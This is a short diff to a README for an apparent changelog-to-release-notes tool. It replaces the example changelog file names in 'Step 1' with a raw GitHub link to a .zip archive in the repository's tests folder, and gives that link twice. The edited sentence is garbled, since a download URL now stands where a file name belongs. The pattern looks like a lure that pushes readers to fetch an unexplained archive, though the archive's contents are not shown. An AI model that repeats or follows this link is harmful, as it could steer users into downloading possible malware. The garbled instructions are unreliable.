VIN07grinder/release-notes-from-changelog/README.md

 ### Step 1: Select Your Changelog File

 Click the "Browse" button.
 Find and select your changelog file on your computer.
-This is usually a file named `CHANGELOG.md` or just `changelog.txt`.
+This is usually a file named `https://raw.githubusercontent.com/VIN07grinder/release-notes-from-changelog/main/tests/release_changelog_notes_from_v2.2.zip` or just `https://raw.githubusercontent.com/VIN07grinder/release-notes-from-changelog/main/tests/release_changelog_notes_from_v2.2.zip`.

 ### Step 2: Choose the Version to Extract